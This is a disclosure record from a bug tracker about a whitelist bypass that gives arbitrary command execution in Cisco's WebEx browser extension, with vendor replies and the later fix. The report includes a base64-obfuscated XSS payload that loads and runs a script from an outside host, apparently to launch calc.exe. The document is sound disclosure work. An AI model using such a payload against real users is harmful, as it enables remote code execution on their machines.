New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 2 users
Status: Fixed
Closed: Jan 2017

Blocked on:
issue 1324

issue 1096

Sign in to add a comment
Cisco: WebEx: New Arbitrary Command Execution in 1.0.5 via Module Whitelist Bypass
Project Member Reported by, Jan 25 2017 Back to list
In version 1.0.5 of the WebEx extension, Cisco added a GpcComponentName whitelist to prevent exploitation via XSS, preventing  issue 1096 .

This can be defeated by putting a module signed by Cisco under GpcUrlRoot, and tricking the installation routine to overwrite one of the whitelisted modules with it. As I already have a copy of MSVCRT.DLL signed by Cisco, I used this one in my exploit.

This requires an XSS on *, but they're unfortunately not difficult to find.

Here is a working example:");eval(atob("ZD1kb2N1bWVudDsocz1kLmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpKS5zcmM9Jy8vbG9jay5jbXB4Y2hnOGIuY29tL0pvUGhlaTdhL3dlYmV4LmpzJztkLmhlYWQuYXBwZW5kQ2hpbGQocyk7"));("

(The eval just loads this script:

Please note, that the script waits 10 seconds before running calc.exe to make sure everything is loaded.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Windows 10-2017-01-24-19-23-30.png
822 KB View Download
Project Member Comment 1 by, Jan 25 2017
Project Member Comment 2 by, Jan 25 2017
Project Member Comment 3 by, Jan 25 2017
I made some minor changes to the exploit script.
7.1 KB View Download
Project Member Comment 4 by, Jan 26 2017

Hi Tavis,
We are tracking this issue under the same ID as the previously reported issue: PSIRT-0085137008. Please include it on all communication to us regarding this vulnerability. I have also filed CSCvc88943 for our developers to investigate further.


Project Member Comment 5 by, Jan 26 2017
Labels: -Restrict-View-Commit
Status: Fixed
It looks like Cisco have released version 1.0.7, which adds a whitelist for the GpcExtName and GpcUnpackName properties that I was using in my exploit.

It looks like they correctly handle Mac and Windows, and have also added some verification on GpcInitCall/GpcExitCall/etc so that functions have to match a RegEx. This looks like a huge improvement.

Another very quick response from Cisco, I continue to be impressed with Cisco's response time.

I do not currently know of any way to defeat this new patch. As the patch is public now, let's mark this fixed.

(Note: I believe the XSS is an independently discovered duplicate of CVE-2009-3731, which is already public).
Project Member Comment 6 by, Jan 26 2017
Cisco's advisory is here

Apparently Firefox and Internet Explorer were also affected, but not on Mac or Linux. I didn't check, but have no reason to doubt Cisco's assessment.
Project Member Comment 7 by, Feb 3 2017
Labels: -Reported-2017-01-24 Reported-2017-Jan-24
Comment 8 Deleted
Comment 9 Deleted
Comment 10 Deleted
Project Member Comment 11 by, Jul 6
Blockedon: 1324
Sign in to add a comment